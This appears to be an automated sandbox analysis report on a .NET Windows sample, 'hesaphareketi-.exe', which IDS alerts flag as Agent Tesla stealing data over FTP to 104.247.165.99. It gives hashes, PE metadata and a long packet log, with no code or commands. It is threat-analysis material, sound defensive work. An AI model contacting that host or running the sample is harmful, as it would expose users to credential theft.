                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379460230152629
                                          Encrypted:false
                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:fLHyIFKL3IZ2KRH9Oug8s
                                          MD5:5EDBE2AEEFE69FB36ECED2E31AC9386F
                                          SHA1:6614C7900E4994E1A3606D22916BE68F701A19D4
                                          SHA-256:4275A59302475C8198165F4EB61EA2A88BD12056EA6EE5197C1BF8E6B6A6F9FD
                                          SHA-512:CFBAB752BE8CB209B25F2D1AD30E08E5E7ADB2EE5B4CCE98DCFD20B05E4B1CEFFCB6551556B134A2123412C864A8A544701C846F204783D99CB58936DC086A76
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.920971759355091
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:hesaphareketi-.exe
                                          File size:661'504 bytes
                                          MD5:c96c8178b1018515d4b43e614a3e3f15
                                          SHA1:8a6601c7aff694ba0843e807a7a1a57bc3cb3665
                                          SHA256:2ca8a08a83d98fbae1d8683cdb828b64216f9849ee539e09198db53876d419e9
                                          SHA512:4d8a0d5a48264df61ed446487eca1593b3bf08633898ce4af5fc8896bdf213653ea2c426fb888ebe2ee5afeceb6f5c4ecdf84ca5155e5135aa37c0f338c163b5
                                          SSDEEP:12288:V5WsXbCawKw4NN3AML30AptH5dIV46qlBghWblKOdB/yMi4ZtMn5HMbGxcbr/5vk:BwkP3AMrzZOPQ1xyMi4ZtqMbA0r/5s
                                          TLSH:FFE40299B3296E2FC63E7DFD1480250903BDA1622193D7C48CC765DA2EC7FF99690063
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|f.............................,... ...@....@.. ....................................@................................
                                          Icon Hash:00928e8e8686b000
                                          Entrypoint:0x4a2c12
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x667CF7A7 [Thu Jun 27 05:24:55 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2bb8 | 0x57 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x598 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xa0c18 | 0xa0e00 | fe488661aadf874ba03081502e520812 | False | 0.9210919289044289 | data | 7.927355797624177 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xa4000 | 0x598 | 0x600 | 01bfe6eeb9195bca6713d6c9e48ba956 | False | 0.427734375 | data | 4.393428476676741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xa6000 | 0xc | 0x200 | 06542b07575fc5ae8277e43b94d369d2 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xa40a0 | 0x344 | data | | | 0.43301435406698563 |
| RT_MANIFEST | 0xa43e4 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 06/27/24-09:19:54.944296 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49703 | 21 | 192.168.2.7 | 104.247.165.99 |
| 06/27/24-09:19:55.631016 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49706 | 53607 | 192.168.2.7 | 104.247.165.99 |
| 06/27/24-09:19:55.631016 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49706 | 53607 | 192.168.2.7 | 104.247.165.99 |
                                          Jun 27, 2024 09:21:52.824430943 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:53.177844048 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:53.351109982 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.031335115 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.036891937 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.245140076 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.245582104 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.250982046 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.251187086 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.251194000 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.259810925 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.879386902 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.879687071 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.884902954 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.884958982 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.884963036 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885016918 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885046005 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885076046 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885096073 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885113001 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885216951 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885245085 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885272026 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885277987 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885291100 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885301113 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885324955 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885349035 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885354042 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885385036 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.885407925 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.885436058 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.890213013 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.890242100 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.890269041 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.890284061 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.890295029 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.890301943 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.890415907 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.890620947 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.890650034 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.890671015 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.890697002 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.892152071 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.892250061 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.897792101 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.897864103 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.902805090 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.903762102 CEST5186949718104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:56.903814077 CEST4971851869192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:56.963049889 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:57.367839098 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:57.460550070 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:59.199033976 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:59.203953981 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:59.413633108 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:59.419437885 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:59.424444914 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:59.424576044 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:59.424755096 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:59.429708004 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.055372000 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.055721998 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.060615063 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060677052 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060681105 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.060731888 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060743093 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.060761929 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060796022 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060827017 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.060863018 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.060868025 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060898066 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060926914 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.060951948 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.060964108 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.060981989 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.061011076 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.061014891 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.061038971 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.061053038 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.065675020 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.065733910 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.065797091 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.065850973 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.065866947 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.065916061 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.065923929 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.065967083 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.065990925 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.066021919 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.066037893 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.066073895 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.066176891 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.066240072 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.066318989 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.066391945 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.070621014 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.070892096 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.070921898 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.070996046 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071086884 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071116924 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071150064 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071305037 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071336985 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071365118 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071501017 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071528912 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071861982 CEST5416849719104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.071913958 CEST4971954168192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.229646921 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.408893108 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.408957005 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:00.547805071 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:00.595781088 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:05.401655912 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:05.409521103 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:05.618824005 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:05.619330883 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:05.624286890 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:05.624392033 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:05.624507904 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:05.630707979 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.237168074 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.272273064 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.277421951 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277435064 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277443886 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277452946 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277473927 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277486086 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277497053 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277514935 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277523041 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.277525902 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.277596951 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.279786110 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.279839039 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282331944 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282381058 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282411098 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282418966 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282474995 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282485962 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282510996 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282521009 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282530069 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282584906 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282587051 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282624960 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282679081 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282687902 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282696009 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282726049 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282747030 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282772064 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.282779932 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.282814026 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.287167072 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287230968 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.287317991 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287369013 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.287379026 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287389040 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287430048 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.287545919 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287556887 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287564993 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287616968 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287787914 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287797928 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.287805080 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.293060064 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.293154955 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.293164015 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.293173075 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.293380022 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.293622017 CEST6107949720104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.293673992 CEST4972061079192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.327651978 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:06.754448891 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:06.960555077 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:07.090320110 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:07.090460062 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:10.359616041 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:10.364491940 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:10.573729038 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:10.574222088 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:10.579272032 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:10.579487085 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:10.579638958 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:10.584578037 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.198812962 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.203962088 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.208867073 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209074020 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209083080 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209094048 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209110975 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209155083 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.209183931 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209192991 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209214926 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.209239006 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209249973 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209271908 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.209275961 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.209304094 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.212145090 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.214080095 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.214124918 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.214153051 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.214190006 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.214200020 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.214219093 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.214219093 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.214241982 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.214271069 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.214431047 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.214564085 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.214570045 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.217582941 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.219063044 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.219175100 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.219320059 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.222238064 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.222495079 CEST6255949721104.247.165.99192.168.2.7
